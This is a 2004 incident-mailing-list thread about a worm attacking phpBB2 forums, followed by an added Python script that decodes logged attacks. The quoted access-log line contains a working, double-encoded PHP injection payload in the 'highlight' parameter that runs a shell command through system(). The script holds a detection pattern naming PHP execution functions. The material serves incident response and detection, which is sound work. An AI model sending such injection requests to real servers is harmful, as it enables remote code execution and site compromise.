RE: Worm hitting PHPbb2 Forums

From: Christopher Adickes (christopher_adickes_at_SHI.com)
Date: 12/21/04

  • Next message: skippy1_at_hickorytech.net: "Re: SSH scans..."
    To: "'L. Walker'" <lwalker@magi.net.au>, incidents@securityfocus.com
    Date: Tue, 21 Dec 2004 12:46:30 -0500
    
    

    In addition to your post, here is some more info.

    http://isc.sans.org/

    -----Original Message-----
    From: L. Walker [mailto:lwalker@magi.net.au]
    Sent: Tuesday, December 21, 2004 4:23 AM
    To: incidents@securityfocus.com
    Cc: full-disclosure@lists.netsys.com
    Subject: Worm hitting PHPbb2 Forums
    Importance: High

    Just spotted two clients hit by this. One client didn't update his
    software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16.
    Chkrootkit says it's Adore; however, it could be something else. Datacenter
    wasn't very smart and has since wiped the server, so no binaries or other
    evidence.

    Generation 12 only wiped out PHP files, replacing them with its own
    message on other client's PHPbb2 forum. Access logs show:

    66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
    /forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%
    2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%
    252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%2
    52echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252
    echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252ec
    hr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252ec
    hr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252ech
    r(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252ec
    hr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr
    (111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr
    (72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34
    ))%252e%2527
    HTTP/1.0" 200 270
    "http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2
    aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)
    %252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%2
    52echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%2
    52echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252e
    chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252e
    chr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252ec
    hr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252e
    chr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252ech
    r(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr
    (106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(
    78)%252echr(41)%252echr(34))%252e%2527"
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

    --
    L. Walker <lwalker at magi dot net dot au>
    Network Administrator / Consultant
    --
    
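The access-log entry quoted above carries its payload double-URL-encoded and assembled from chr() calls, which is why a grep for "system(" on the raw line finds nothing. Below is an added triage script, written for this page and not part of either message, that parses Apache combined-log lines, fully percent-decodes the highlight parameter, flags PHP execution functions or chr() chains, and expands the chain so the analyst can read what was requested. The only input taken from the page is the request target from the logged line; the second (benign) log line, the "-" referrer on the first, and the list of flagged function names are constructed for the example.

```python
"""Triage helper for the phpBB 'highlight' injection seen in the post above.

Parses Apache combined-log lines, fully percent-decodes the 'highlight'
query parameter (the request double-encodes it), flags PHP code-execution
patterns, and expands chr() chains so an analyst can read the payload.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request target copied verbatim from the access-log entry in L. Walker's post.
SAMPLE_REQUEST = (
    "/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a"
    "&highlight=%2527%252Esystem(chr(112)"
    "%252echr(101)%252echr(114)%252echr(108)%252echr(32)"
    "%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)"
    "%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)"
    "%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)"
    "%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)"
    "%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)"
    "%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)"
    "%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)"
    "%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)"
    "%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)"
    "%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)"
    "%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))"
    "%252e%2527"
)

# Constructed sample log: the post's request (referrer replaced by "-")
# followed by a benign forum search, so the scanner has something to ignore.
SAMPLE_LOG = [
    '66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET ' + SAMPLE_REQUEST
    + ' HTTP/1.0" 200 270 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '192.0.2.10 - - [21/Dec/2004:18:09:02 +1100] "GET /forum/viewtopic.php?t=7'
    '&highlight=kernel HTTP/1.1" 200 8841 "-" "Mozilla/5.0"',
]

# Apache combined log format, up to and including the response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
CHR_CALL = re.compile(r"chr\((\d{1,3})\)")
# PHP functions that hand a string to the shell or the interpreter (constructed list).
EXEC_CALL = re.compile(r"\b(system|exec|passthru|shell_exec|popen|eval)\s*\(", re.I)


def full_unquote(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the value stops changing: '%2527' -> '%27' -> "'"."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def decode_chr_chain(expr: str) -> str:
    """Expand a PHP chr(N).chr(N)... chain into the text it builds."""
    return "".join(chr(int(n)) for n in CHR_CALL.findall(expr))


def analyse_request(target: str) -> dict:
    """Decode the highlight parameter and report whether it carries PHP code."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    # parse_qs decodes one layer; full_unquote strips the remaining layers.
    highlight = " ".join(full_unquote(v) for v in query.get("highlight", []))
    return {
        "highlight": highlight,
        "suspicious": bool(EXEC_CALL.search(highlight)) or "chr(" in highlight,
        "chr_decoded": decode_chr_chain(highlight),
    }


def scan_log(lines) -> list:
    """Return one record per log line whose highlight parameter looks like injection."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        report = analyse_request(m.group("target"))
        if report["suspicious"]:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "status": m.group("status"), **report})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['ts']} status={hit['status']}")
        print("  highlight :", hit["highlight"][:60], "...")
        print("  decoded   :", hit["chr_decoded"])
```

Run as a script, it prints the decoded request: a perl one-liner that creates a file and prints a fixed marker string, consistent with the 200/270-byte response being used as a success check before the destructive generations followed. The decoder works on the decoded value rather than the raw line because the double encoding defeats any single-decode filter; the same check applied to the Referer field would have caught this entry too, since the worm carried the full request there as well.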
